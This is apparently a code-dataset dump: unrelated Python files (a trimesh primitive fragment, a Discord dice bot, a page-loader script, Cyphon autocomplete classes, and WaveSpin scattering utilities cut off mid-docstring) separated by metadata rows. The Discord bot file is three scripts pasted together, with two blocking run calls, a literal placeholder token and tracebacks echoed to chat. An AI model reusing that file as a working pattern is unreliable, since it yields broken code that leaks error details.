return stored.copy()[0]
@extrude_height.setter
def extrude_height(self, value):
self._data['extrude_height'] = float(value)
@property
def extrude_polygon(self):
stored = self._data['extrude_polygon']
if stored is None:
raise ValueError('extrude polygon not specified!')
return stored[0]
@extrude_polygon.setter
def extrude_polygon(self, value):
polygon = creation.validate_polygon(value)
self._data['extrude_polygon'] = polygon
@property
def extrude_direction(self):
direction = np.dot(self.extrude_transform[:3,:3],
[0.0,0.0,1.0])
return direction
def slide(self, distance):
distance = float(distance)
translation = np.eye(4)
translation[2,3] = distance
new_transform = np.dot(self.extrude_transform.copy(),
translation.copy())
self.extrude_transform = new_transform
def _create_mesh(self):
log.debug('Creating mesh for extrude primitive')
mesh = creation.extrude_polygon(self.extrude_polygon,
self.extrude_height)
mesh.apply_transform(self.extrude_transform)
self._cache['vertices'] = mesh.vertices
self._cache['faces'] = mesh.faces
self._cache['face_normals'] = mesh.face_normals
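
# --- Illustrative usage (added; a sketch, not part of the original module) ---
# Assuming this module is importable as `trimesh.primitives` with its
# dependencies installed, primitives behave like lazily-meshed Trimesh objects;
# the keyword names follow the constructors defined above.
#
#   from trimesh import primitives
#   s = primitives.Sphere(sphere_radius=2.0, sphere_center=[0.0, 0.0, 1.0])
#   b = primitives.Box(box_extents=[1.0, 2.0, 3.0])
#   s.vertices.shape, b.faces.shape  # meshes are generated on first access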
| 33.52381 | 87 | 0.605114 | 1,065 | 9,152 | 5.010329 | 0.130516 | 0.028486 | 0.026237 | 0.023613 | 0.285045 | 0.20521 | 0.192841 | 0.165105 | 0.119003 | 0.10401 | 0 | 0.011515 | 0.288352 | 9,152 | 272 | 88 | 33.647059 | 0.807769 | 0.116149 | 0 | 0.253731 | 0 | 0.004975 | 0.11385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.164179 | false | 0 | 0.034826 | 0.004975 | 0.328358 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7742de3e4510356f7231d426f247a622c865b21 | 1,923 | py | Python | discordbot.py | asamii0006/discordpy-startup | 3a14a4155373fff96067954e85ad64658e4bbbf5 | [
"MIT"
] | null | null | null | discordbot.py | asamii0006/discordpy-startup | 3a14a4155373fff96067954e85ad64658e4bbbf5 | [
"MIT"
] | null | null | null | discordbot.py | asamii0006/discordpy-startup | 3a14a4155373fff96067954e85ad64658e4bbbf5 | [
"MIT"
] | null | null | null | from discord.ext import commands
import os
import traceback
bot = commands.Bot(command_prefix='/')
token = os.environ['DISCORD_BOT_TOKEN']
@bot.event
async def on_command_error(ctx, error):
    orig_error = getattr(error, "original", error)
    error_msg = ''.join(traceback.TracebackException.from_exception(orig_error).format())
    await ctx.send(error_msg)

@bot.command()
async def hello(ctx):
    await ctx.send('Heya~!')

bot.run(token)
# coding: utf-8
import random
import re

pattern = r'\d{1,2}d\d{1,3}|\d{1,2}D\d{1,3}'
split_pattern = r'd|D'

# Is the string an nDn dice expression?
def judge_nDn(src):
    repatter = re.compile(pattern)
    result = repatter.fullmatch(src)
    if result is not None:
        return True
    elif src == '1d114514' or src == '1D114514':
        return True
    return False

# Split into roll count and number of die faces
def split_nDn(src):
    return re.split(split_pattern, src)

# Roll the dice
def role_nDn(src):
    result = []
    sum_dice = 0
    role_index = split_nDn(src)
    role_count = int(role_index[0])
    nDice = int(role_index[1])
    for i in range(role_count):
        tmp = random.randint(1, nDice)
        result.append(tmp)
        sum_dice = sum_dice + tmp
    is1dice = True if role_count == 1 else False
    return result, sum_dice, is1dice

def nDn(text):
    if judge_nDn(text):
        result, sum_dice, is1dice = role_nDn(text)
        if is1dice:
            return 'Dice: ' + text + '\nRoll: ' + str(sum_dice)
        else:
            return 'Dice: ' + text + '\nRolls: ' + str(result) + '\nTotal: ' + str(sum_dice)
    else:
        return None
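
# Illustrative check (added; not part of the original file) -- rolling two
# six-sided dice; the individual rolls are random, so output values vary:
#   print(nDn('2d6'))
#   # Dice: 2d6
#   # Rolls: [3, 5]
#   # Total: 8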
import discord
import nDnDICE
client = discord.Client()
@client.event
async def on_ready():
    print('Bot started.')

@client.event
async def on_message(message):
    msg = message.content
    result = nDnDICE.nDn(msg)
    if result is not None:
        # discord.py >= 1.0 removed Client.send_message; Messageable.send replaces it
        await message.channel.send(result)

# Enter the bot's access token here
client.run('DISCORD_BOT_TOKEN')
| 22.103448 | 89 | 0.651586 | 272 | 1,923 | 4.474265 | 0.345588 | 0.040263 | 0.032046 | 0.036976 | 0.130649 | 0.011504 | 0.011504 | 0 | 0 | 0 | 0 | 0.021448 | 0.224129 | 1,923 | 86 | 90 | 22.360465 | 0.794236 | 0.031721 | 0 | 0.129032 | 0 | 0.016129 | 0.071659 | 0.016703 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.112903 | 0.016129 | 0.306452 | 0.016129 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7765cf07995f7e47b792bf00a9c30793c228c4a | 1,604 | py | Python | filling/parse/ex.py | nvxden/flask-films | 038f4bcaa7feabdfff7662fb1048bf48515e5c26 | [
"MIT"
] | null | null | null | filling/parse/ex.py | nvxden/flask-films | 038f4bcaa7feabdfff7662fb1048bf48515e5c26 | [
"MIT"
] | null | null | null | filling/parse/ex.py | nvxden/flask-films | 038f4bcaa7feabdfff7662fb1048bf48515e5c26 | [
"MIT"
] | null | null | null | import asyncio as aio
import os
import re
from aiohttp import ClientSession
from pageloader import LoadPageTask, PageLoader
from nvxlira import Lira
from nvxaex import Executor
############################################################
# class
class LoadPage(LoadPageTask):
    def __str__(self):
        return self.filename
############################################################
# lira
lira = Lira('data.bin', 'head.bin')
if len(lira['load-page']) == 0 and len(lira['load-page-done']) == 0:
    for url in [
        'http://www.world-art.ru/cinema/cinema.php?id=65021',
        'http://www.world-art.ru/cinema/cinema.php?id=17190',
        'http://www.world-art.ru/cinema/cinema.php?id=36896',
        'http://www.world-art.ru/cinema/cinema.php?id=547',
        'http://www.world-art.ru/cinema/cinema.php?id=50952'
    ]:
        task = LoadPage(url=url, filename='works/' + re.search(r'id=(\d+)', url).group(1) + '.html')
        lira.put(task, cat='load-page')

print('Not done:')
for task in [lira.get(id) for id in lira['load-page']]:
    print(task)

print('Done:')
for task in [lira.get(id) for id in lira['load-page-done']]:
    print(task)
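
# Illustrative check (added): each task's output filename is derived from the
# URL's `id` query parameter, e.g.
#   re.search(r'id=(\d+)', 'http://www.world-art.ru/cinema/cinema.php?id=547').group(1)
#   # -> '547', so the task writes to 'works/547.html'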
############################################################
# main
async def main():
    async with ClientSession() as session:
        loader = PageLoader(session, silent=False)
        ex = Executor(lira, loader, silent=False)
        await ex.extasks('load-page', 'load-page-done')
    return
############################################################
# run
try: os.mkdir('works')
except: pass
aio.run(main())
del lira
############################################################
# END
| 20.831169 | 93 | 0.545511 | 204 | 1,604 | 4.269608 | 0.377451 | 0.064294 | 0.068886 | 0.086108 | 0.289323 | 0.289323 | 0.289323 | 0.289323 | 0.289323 | 0.094145 | 0 | 0.018532 | 0.125312 | 1,604 | 76 | 94 | 21.105263 | 0.602281 | 0.014963 | 0 | 0.054054 | 0 | 0 | 0.298273 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0.027027 | 0.189189 | 0.027027 | 0.297297 | 0.108108 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e776bec5c2d6010767a894ee51a22e9c4a498c74 | 5,803 | py | Python | Incident-Response/Tools/cyphon/cyphon/contexts/autocomplete_light_registry.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 1 | 2021-07-24T17:22:50.000Z | 2021-07-24T17:22:50.000Z | Incident-Response/Tools/cyphon/cyphon/contexts/autocomplete_light_registry.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-28T03:40:31.000Z | 2022-02-28T03:40:52.000Z | Incident-Response/Tools/cyphon/cyphon/contexts/autocomplete_light_registry.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-25T08:34:51.000Z | 2022-03-16T17:29:44.000Z | # -*- coding: utf-8 -*-
# Copyright 2017-2019 ControlScan, Inc.
#
# This file is part of Cyphon Engine.
#
# Cyphon Engine is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# Cyphon Engine is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cyphon Engine. If not, see <http://www.gnu.org/licenses/>.
"""
Defines Autocomplete models for use in admin pages for the Contexts app.
"""
# third party
import autocomplete_light.shortcuts as autocomplete_light
# local
from distilleries.models import Distillery
from utils.choices.choices import get_operator_choices, get_field_type
from .models import Context
class FilterValueFieldsByFocalDistillery(autocomplete_light.AutocompleteListBase):
    """
    Defines autocomplete rules for the value_field on the Context admin
    page.
    """
    choices = ()
    attrs = {
        'data-autocomplete-minimum-characters': 0,
        'placeholder': 'select a distillery and click to see options...'
    }

    def choices_for_request(self):
        """
        Overrides the choices_for_request method of the AutocompleteListBase
        class. Filters options based on the selected primary_distillery.
        """
        choices = self.choices
        distillery_id = self.request.GET.get('primary_distillery', None)
        if distillery_id:
            distillery = Distillery.objects.get(pk=distillery_id)
            choices = distillery.get_field_list()
        return self.order_choices(choices)[0:self.limit_choices]


class FilterSearchFieldsByRelatedDistillery(autocomplete_light.AutocompleteListBase):
    """
    Defines autocomplete rules for the search_field on the Context admin
    page.
    """
    choices = ()
    attrs = {
        'data-autocomplete-minimum-characters': 0,
        'placeholder': 'select a related distillery and click to see options...'
    }

    def choices_for_request(self):
        """
        Overrides the choices_for_request method of the AutocompleteListBase
        class. Filters options based on the selected related_distillery.
        """
        choices = self.choices
        distillery_id = self.request.GET.get('related_distillery', None)
        if distillery_id:
            distillery = Distillery.objects.get(pk=distillery_id)
            choices = distillery.get_field_list()
        return self.order_choices(choices)[0:self.limit_choices]


class FilterValueFieldsByContext(autocomplete_light.AutocompleteListBase):
    """
    Defines autocomplete rules for the value_field on the ContextFilter
    admin page.
    """
    choices = ()
    attrs = {
        'data-autocomplete-minimum-characters': 0,
        'placeholder': 'select a distillery and click to see options...'
    }

    def choices_for_request(self):
        """
        Overrides the choices_for_request method of the AutocompleteListBase
        class. Filters options based on the primary_distillery of the selected
        Context.
        """
        choices = self.choices
        context_id = self.request.GET.get('context', None)
        if context_id:
            context = Context.objects.select_related('primary_distillery')\
                             .get(pk=context_id)
            choices = context.primary_distillery.get_field_list()
        return self.order_choices(choices)[0:self.limit_choices]


class FilterSearchFieldsByContext(autocomplete_light.AutocompleteListBase):
    """
    Defines autocomplete rules for the search_field on the ContextFilter
    admin page.
    """
    choices = ()
    attrs = {
        'data-autocomplete-minimum-characters': 0,
        'placeholder': 'select a distillery and click to see options...'
    }

    def choices_for_request(self):
        """
        Overrides the choices_for_request method of the AutocompleteListBase
        class. Filters options based on the related_distillery of the
        selected Context.
        """
        choices = self.choices
        context_id = self.request.GET.get('context', None)
        if context_id:
            context = Context.objects.select_related('related_distillery')\
                             .get(pk=context_id)
            choices = context.related_distillery.get_field_list()
        return self.order_choices(choices)[0:self.limit_choices]


class FilterOperatorsBySearchField(autocomplete_light.AutocompleteChoiceListBase):
    """
    Defines autocomplete rules for the operator field on the ContextFilter
    admin page.
    """
    choices = ()
    attrs = {
        'data-autocomplete-minimum-characters': 0,
        'placeholder': 'select a search field and click to see options...'
    }

    def choices_for_request(self):
        """
        Overrides the choices_for_request method of the AutocompleteListBase
        class. Filters options based on the selected search_field.
        """
        choices = self.choices
        search_field = self.request.GET.get('search_field', None)
        if search_field:
            field_type = get_field_type(search_field)
            choices = get_operator_choices(field_type)
        return self.order_choices(choices)[0:self.limit_choices]
autocomplete_light.register(FilterValueFieldsByFocalDistillery)
autocomplete_light.register(FilterSearchFieldsByRelatedDistillery)
autocomplete_light.register(FilterValueFieldsByContext)
autocomplete_light.register(FilterSearchFieldsByContext)
autocomplete_light.register(FilterOperatorsBySearchField)
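
# Request flow sketch (added; a simplified illustration -- the exact
# constructor and URL wiring belong to django-autocomplete-light, so any
# specifics beyond the classes above are assumptions): when the Context admin
# form issues a request such as `?primary_distillery=3`, choices_for_request()
# swaps the empty static `choices` for that Distillery's field list before
# ordering and truncating to `limit_choices`.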
| 33.16 | 85 | 0.697398 | 652 | 5,803 | 6.064417 | 0.211656 | 0.051593 | 0.042994 | 0.034143 | 0.643146 | 0.628983 | 0.61482 | 0.595599 | 0.595599 | 0.583966 | 0 | 0.004449 | 0.225401 | 5,803 | 174 | 86 | 33.350575 | 0.875195 | 0.31656 | 0 | 0.592105 | 0 | 0 | 0.157322 | 0.048993 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065789 | false | 0 | 0.052632 | 0 | 0.381579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e77966df213ba660b9ceebdaefcb943c9ce395a4 | 33,959 | py | Python | wavespin/scattering1d/utils.py | OverLordGoldDragon/dev_tg | 1e06b89c1b0b5e95d9c53fda2efd02e41f708718 | [
"MIT"
] | 2 | 2020-03-28T05:37:34.000Z | 2020-09-17T20:02:21.000Z | wavespin/scattering1d/utils.py | OverLordGoldDragon/dev_tg | 1e06b89c1b0b5e95d9c53fda2efd02e41f708718 | [
"MIT"
] | 2 | 2020-06-02T17:52:53.000Z | 2020-09-18T00:46:34.000Z | wavespin/scattering1d/utils.py | OverLordGoldDragon/dev_tg | 1e06b89c1b0b5e95d9c53fda2efd02e41f708718 | [
"MIT"
] | 1 | 2020-06-02T17:52:24.000Z | 2020-06-02T17:52:24.000Z | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2022- John Muradeli
#
# Distributed under the terms of the MIT License
# (see wavespin/__init__.py for details)
# -----------------------------------------------------------------------------
import numpy as np
import math
from .filter_bank import (calibrate_scattering_filters, compute_temporal_support,
                          compute_minimum_required_length, gauss_1d, morlet_1d)
def compute_border_indices(log2_T, J, i0, i1):
    """
    Computes border indices at all scales which correspond to the original
    signal boundaries after padding.

    At the finest resolution,
    original_signal = padded_signal[..., i0:i1].
    This function finds the integers i0, i1 for all temporal subsamplings
    by 2**J, being conservative on the indices.

    Maximal subsampling is by `2**log2_T` if `average=True`, else by
    `2**max(log2_T, J)`. We compute indices up to the latter to be sure.

    Parameters
    ----------
    log2_T : int
        Maximal subsampling by low-pass filtering is `2**log2_T`.
    J : int / tuple[int]
        Maximal subsampling by band-pass filtering is `2**J`.
    i0 : int
        start index of the original signal at the finest resolution
    i1 : int
        end index (excluded) of the original signal at the finest resolution

    Returns
    -------
    ind_start, ind_end: dictionaries with keys in [0, ..., log2_T] such that the
        original signal is in padded_signal[ind_start[j]:ind_end[j]]
        after subsampling by 2**j

    References
    ----------
    This is a modification of
    https://github.com/kymatio/kymatio/blob/master/kymatio/scattering1d/utils.py
    Kymatio, (C) 2018-present. The Kymatio developers.
    """
    if isinstance(J, tuple):
        J = max(J)
    ind_start = {0: i0}
    ind_end = {0: i1}
    for j in range(1, max(log2_T, J) + 1):
        ind_start[j] = (ind_start[j - 1] // 2) + (ind_start[j - 1] % 2)
        ind_end[j] = (ind_end[j - 1] // 2) + (ind_end[j - 1] % 2)
    return ind_start, ind_end
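
# Illustrative check (added; not in the original module): for a signal
# occupying padded indices [2, 10) with log2_T = J = 2, each halving rounds
# the start index up and keeps the end index conservative:
#   compute_border_indices(log2_T=2, J=2, i0=2, i1=10)
#   # -> ({0: 2, 1: 1, 2: 1}, {0: 10, 1: 5, 2: 3})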
def compute_padding(J_pad, N):
    """
    Computes the padding to be added on the left and on the right
    of the signal.

    It should hold that 2**J_pad >= N

    Parameters
    ----------
    J_pad : int
        2**J_pad is the support of the padded signal
    N : int
        original signal support size

    Returns
    -------
    pad_left: amount to pad on the left ("beginning" of the support)
    pad_right: amount to pad on the right ("end" of the support)

    References
    ----------
    This is a modification of
    https://github.com/kymatio/kymatio/blob/master/kymatio/scattering1d/utils.py
    Kymatio, (C) 2018-present. The Kymatio developers.
    """
    N_pad = 2**J_pad
    if N_pad < N:
        raise ValueError('Padding support should be larger than the original '
                         'signal size!')
    to_add = 2**J_pad - N
    pad_right = to_add // 2
    pad_left = to_add - pad_right
    return pad_left, pad_right
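
# Illustrative check (added): padding a length-13 signal to 2**4 == 16 splits
# the 3 extra samples with the larger share on the left:
#   compute_padding(J_pad=4, N=13)  # -> (2, 1)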
def compute_minimum_support_to_pad(N, J, Q, T, criterion_amplitude=1e-3,
                                   normalize='l1', r_psi=math.sqrt(0.5),
                                   sigma0=1e-1, alpha=4., P_max=5, eps=1e-7,
                                   pad_mode='reflect'):
    """
    Computes the support to pad given the input size and the parameters of the
    scattering transform.

    Parameters
    ----------
    N : int
        temporal size of the input signal
    J : int
        scale of the scattering
    Q : int >= 1
        The number of first-order wavelets per octave. Defaults to `1`.
        If tuple, sets `Q = (Q1, Q2)`, where `Q2` is the number of
        second-order wavelets per octave (which defaults to `1`).

          - If `Q1==0`, will exclude `psi1_f` from computation.
          - If `Q2==0`, will exclude `psi2_f` from computation.
    T : int
        temporal support of low-pass filter, controlling amount of imposed
        time-shift invariance and maximum subsampling
    normalize : string / tuple[string], optional
        Normalization convention for the filters (in the temporal domain).
        Supports 'l1', 'l2', 'l1-energy', 'l2-energy', but only 'l1' or 'l2' is
        used. See `help(Scattering1D)`.
    criterion_amplitude: float `>0` and `<1`, optional
        Represents the numerical error which is allowed to be lost after
        convolution and padding.
        The larger criterion_amplitude, the smaller the padding size is.
        Defaults to `1e-3`
    r_psi : float, optional
        Should be `>0` and `<1`. Controls the redundancy of the filters
        (the larger r_psi, the larger the overlap between adjacent
        wavelets).
        Defaults to `sqrt(0.5)`.
    sigma0 : float, optional
        parameter controlling the frequential width of the
        low-pass filter at J_scattering=0; at an absolute J_scattering,
        it is equal to :math:`\\frac{\\sigma_0}{2^J}`.
        Defaults to `1e-1`.
    alpha : float, optional
        tolerance factor for the aliasing after subsampling.
        The larger the alpha, the more conservative the value of maximal
        subsampling is.
        Defaults to `4.`.
    P_max : int, optional
        maximal number of periods to use to make sure that the Fourier
        transform of the filters is periodic.
        `P_max = 5` is more than enough for double precision.
        Defaults to `5`.
    eps : float, optional
        required machine precision for the periodization (single
        floating point is enough for deep learning applications).
        Defaults to `1e-7`.
    pad_mode : str
        Name of padding used. If 'zero', will halve `min_to_pad`, else no effect.

    Returns
    -------
    min_to_pad : int
        minimal value to pad the signal on one side to avoid any
        boundary error.
    pad_phi, pad_psi1, pad_psi2 : int, int, int
        The individual padding requirements of the lowpass, first-order, and
        second-order filters, whose maximum is `min_to_pad`.
    """
    # compute params for calibrating, & calibrate
    Q1, Q2 = Q if isinstance(Q, tuple) else (Q, 1)
    Q_temp = (max(Q1, 1), max(Q2, 1))  # don't pass in zero
    N_init = N

    # `None` means `xi_min` is limitless. Since this method is used to compute
    # padding, then we can't know what it is, so we compute worst case.
    # If `max_pad_factor=None`, then the realized filterbank's (what's built)
    # `xi_min` is also limitless. Else, it'll be greater, depending on
    # `max_pad_factor`.
    J_pad = None

    sigma_low, xi1, sigma1, j1s, _, xi2, sigma2, j2s, _ = \
        calibrate_scattering_filters(J, Q_temp, T, r_psi=r_psi, sigma0=sigma0,
                                     alpha=alpha, J_pad=J_pad)

    # split `normalize` into orders
    if isinstance(normalize, tuple):
        normalize1, normalize2 = normalize
    else:
        normalize1 = normalize2 = normalize

    # compute psi1_f with greatest time support, if requested
    if Q1 >= 1:
        psi1_f_fn = lambda N: morlet_1d(N, xi1[-1], sigma1[-1],
                                        normalize=normalize1, P_max=P_max, eps=eps)
    # compute psi2_f with greatest time support, if requested
    if Q2 >= 1:
        psi2_f_fn = lambda N: morlet_1d(N, xi2[-1], sigma2[-1],
                                        normalize=normalize2, P_max=P_max, eps=eps)
    # compute lowpass
    phi_f_fn = lambda N: gauss_1d(N, sigma_low, normalize=normalize1,
                                  P_max=P_max, eps=eps)

    # compute for all cases as psi's time support might exceed phi's
    ca = dict(criterion_amplitude=criterion_amplitude)
    N_min_phi = compute_minimum_required_length(phi_f_fn, N_init=N_init, **ca)
    phi_halfsupport = compute_temporal_support(phi_f_fn(N_min_phi)[None], **ca)

    if Q1 >= 1:
        N_min_psi1 = compute_minimum_required_length(psi1_f_fn, N_init=N_init,
                                                     **ca)
        psi1_halfsupport = compute_temporal_support(psi1_f_fn(N_min_psi1)[None],
                                                    **ca)
    else:
        psi1_halfsupport = -1  # placeholder

    if Q2 >= 1:
        N_min_psi2 = compute_minimum_required_length(psi2_f_fn, N_init=N_init,
                                                     **ca)
        psi2_halfsupport = compute_temporal_support(psi2_f_fn(N_min_psi2)[None],
                                                    **ca)
    else:
        psi2_halfsupport = -1

    # set min to pad based on each
    pads = (phi_halfsupport, psi1_halfsupport, psi2_halfsupport)
    # can pad half as much
    if pad_mode == 'zero':
        pads = [p // 2 for p in pads]
    pad_phi, pad_psi1, pad_psi2 = pads
    # set main quantity as the max of all
    min_to_pad = max(pads)

    # return results
    return min_to_pad, pad_phi, pad_psi1, pad_psi2
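
# Example call (added; the argument values are hypothetical): one-sided pad
# amount plus the per-filter half-supports it is the maximum of, for a
# length-2048 signal:
#   min_to_pad, pad_phi, pad_psi1, pad_psi2 = compute_minimum_support_to_pad(
#       N=2048, J=8, Q=8, T=2**8)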
def compute_meta_scattering(J_pad, J, Q, T, r_psi=math.sqrt(.5), max_order=2):
    """Get metadata on the transform.

    This information specifies the content of each scattering coefficient,
    which order, which frequencies, which filters were used, and so on.

    Parameters
    ----------
    J : int
        The maximum log-scale of the scattering transform.
        In other words, the maximum scale is given by `2**J`.
    Q : int >= 1 / tuple[int]
        The number of first-order wavelets per octave. Defaults to `1`.
        If tuple, sets `Q = (Q1, Q2)`, where `Q2` is the number of
        second-order wavelets per octave (which defaults to `1`).
    J_pad : int
        2**J_pad == amount of temporal padding
    T : int
        temporal support of low-pass filter, controlling amount of imposed
        time-shift invariance and maximum subsampling
    r_psi : float
        Filter redundancy.
        See `help(wavespin.scattering1d.filter_bank.calibrate_scattering_filters)`.
    max_order : int, optional
        The maximum order of scattering coefficients to compute.
        Must be either equal to `1` or `2`. Defaults to `2`.

    Returns
    -------
    meta : dictionary
        A dictionary with the following keys:

        - `'order'` : tensor
            A Tensor of length `C`, the total number of scattering
            coefficients, specifying the scattering order.
        - `'xi'` : tensor
            A Tensor of size `(C, max_order)`, specifying the center
            frequency of the filter used at each order (padded with NaNs).
        - `'sigma'` : tensor
            A Tensor of size `(C, max_order)`, specifying the frequency
            bandwidth of the filter used at each order (padded with NaNs).
        - `'j'` : tensor
            A Tensor of size `(C, max_order)`, specifying the dyadic scale
            of the filter used at each order (padded with NaNs).
        - `'is_cqt'` : tensor
            A tensor of size `(C, max_order)`, specifying whether the filter
            was constructed per Constant Q Transform (padded with NaNs).
        - `'n'` : tensor
            A Tensor of size `(C, max_order)`, specifying the indices of
            the filters used at each order (padded with NaNs).
        - `'key'` : list
            The tuples indexing the corresponding scattering coefficient
            in the non-vectorized output.

    References
    ----------
    This is a modification of
    https://github.com/kymatio/kymatio/blob/master/kymatio/scattering1d/utils.py
    Kymatio, (C) 2018-present. The Kymatio developers.
    """
    sigma_low, xi1s, sigma1s, j1s, is_cqt1s, xi2s, sigma2s, j2s, is_cqt2s = \
        calibrate_scattering_filters(J, Q, T, r_psi=r_psi, J_pad=J_pad)
    log2_T = math.floor(math.log2(T))

    meta = {}
    meta['order'] = [[], [], []]
    meta['xi'] = [[], [], []]
    meta['sigma'] = [[], [], []]
    meta['j'] = [[], [], []]
    meta['is_cqt'] = [[], [], []]
    meta['n'] = [[], [], []]
    meta['key'] = [[], [], []]

    meta['order'][0].append(0)
    meta['xi'][0].append((0,))
    meta['sigma'][0].append((sigma_low,))
    meta['j'][0].append((log2_T,))
    meta['is_cqt'][0].append(())
    meta['n'][0].append(())
    meta['key'][0].append(())

    for (n1, (xi1, sigma1, j1, is_cqt1)
         ) in enumerate(zip(xi1s, sigma1s, j1s, is_cqt1s)):
        meta['order'][1].append(1)
        meta['xi'][1].append((xi1,))
        meta['sigma'][1].append((sigma1,))
        meta['j'][1].append((j1,))
        meta['is_cqt'][1].append((is_cqt1,))
        meta['n'][1].append((n1,))
        meta['key'][1].append((n1,))

        if max_order < 2:
            continue

        for (n2, (xi2, sigma2, j2, is_cqt2)
             ) in enumerate(zip(xi2s, sigma2s, j2s, is_cqt2s)):
            if j2 > j1:
                meta['order'][2].append(2)
                meta['xi'][2].append((xi1, xi2))
                meta['sigma'][2].append((sigma1, sigma2))
                meta['j'][2].append((j1, j2))
                meta['is_cqt'][2].append((is_cqt1, is_cqt2))
                meta['n'][2].append((n1, n2))
                meta['key'][2].append((n1, n2))

    for field, value in meta.items():
        meta[field] = value[0] + value[1] + value[2]

    pad_fields = ['xi', 'sigma', 'j', 'is_cqt', 'n']
    pad_len = max_order
    for field in pad_fields:
        meta[field] = [x + (math.nan,) * (pad_len - len(x)) for x in meta[field]]

    array_fields = ['order', 'xi', 'sigma', 'j', 'is_cqt', 'n']
    for field in array_fields:
        meta[field] = np.array(meta[field])

    return meta
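
# Example access pattern (added; a sketch with hypothetical arguments):
#   meta = compute_meta_scattering(J_pad=11, J=8, Q=8, T=2**8)
#   meta['order']                  # 0/1/2 per coefficient
#   meta['n'][meta['order'] == 2]  # (n1, n2) filter-index pairs, NaN-padded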
def compute_meta_jtfs(J_pad, J, Q, T, r_psi, sigma0, average, average_global,
                      average_global_phi, oversampling, out_exclude,
                      paths_exclude, scf):
    """Get metadata on the Joint Time-Frequency Scattering transform.

    This information specifies the content of each scattering coefficient,
    which order, which frequencies, which filters were used, and so on.
    See below for more info.

    Parameters
    ----------
    J_pad : int
        2**J_pad == amount of temporal padding.
    J, Q, J_fr, T, F : int, int, int, int, int
        See `help(wavespin.scattering1d.TimeFrequencyScattering1D)`.
        Control physical meta of bandpass and lowpass filters (xi, sigma, etc).
    out_3D : bool
        - True: will reshape meta fields to match output structure:
          `(n_coeffs, n_freqs, meta_len)`.
        - False: pack flattened: `(n_coeffs * n_freqs, meta_len)`.
    out_type : str
        - `'dict:list'` or `'dict:array'`: meta is packed
          into respective pairs (e.g. `meta['n']['psi_t * phi_f'][1]`)
        - `'list'` or `'array'`: meta is flattened (e.g. `meta['n'][15]`).
    out_exclude : list/tuple[str]
        Names of coefficient pairs to exclude from meta.
    sampling_filters_fr : tuple[str]
        See `help(TimeFrequencyScattering1D)`. Affects `xi`, `sigma`, and `j`.
    average : bool
        Affects `S0`'s meta, and temporal stride meta.
    average_global : bool
        Affects `S0`'s meta, and temporal stride meta.
    average_global_phi : bool
        Affects joint temporal stride meta.
    oversampling : int
        Affects temporal stride meta.
    scf : `scattering1d.frontend.base_frontend._FrequencyScatteringBase`
        Frequential scattering object, storing pertinent attributes and filters.

    Returns
    -------
    meta : dictionary
        A dictionary with the following keys:

        - `'order'` : tensor
            A Tensor of length `C`, the total number of scattering
            coefficients, specifying the scattering order.
        - `'xi'` : tensor
            A Tensor of size `(C, 3)`, specifying the center
            frequency of the filter used at each order (padded with NaNs).
        - `'sigma'` : tensor
            A Tensor of size `(C, 3)`, specifying the frequency
            bandwidth of the filter used at each order (padded with NaNs).
        - `'j'` : tensor
            A Tensor of size `(C, 3)`, specifying the dyadic scale
            of the filter used at each order (padded with NaNs), excluding
            lowpass filtering (unless it was the only filtering).
        - `'is_cqt'` : tensor
            A tensor of size `(C, max_order)`, specifying whether the filter
            was constructed per Constant Q Transform (padded with NaNs).
        - `'n'` : tensor
            A Tensor of size `(C, 3)`, specifying the indices of
            the filters used at each order (padded with NaNs).
            Lowpass filters in `phi_*` pairs are denoted via `-1`.
        - `'s'` : tensor
            A Tensor of length `C`, specifying the spin of
            each frequency scattering filter (+1=up, -1=down, 0=none).
        - `'stride'` : tensor
            A Tensor of size `(C, 2)`, specifying the total temporal and
            frequential convolutional stride (i.e. subsampling) of resulting
            coefficient (including lowpass filtering).
        - `'key'` : list
            The tuples indexing the corresponding scattering coefficient
            in the non-vectorized output.

    In case of `out_3D=True`, for joint pairs, will reshape each field into
    `(n_coeffs, C, meta_len)`, where `n_coeffs` is the number of joint slices
    in the pair, and `meta_len` is the existing `shape[-1]` (1, 2, or 3).

    Computation and Structure
    -------------------------
    Computation replicates logic in `timefrequency_scattering1d()`. Meta values
    depend on:

        - out_3D (True only possible with `average and average_fr`)
        - aligned
        - sampling_psi_fr
        - sampling_phi_fr
        - average
        - average_global
        - average_global_phi
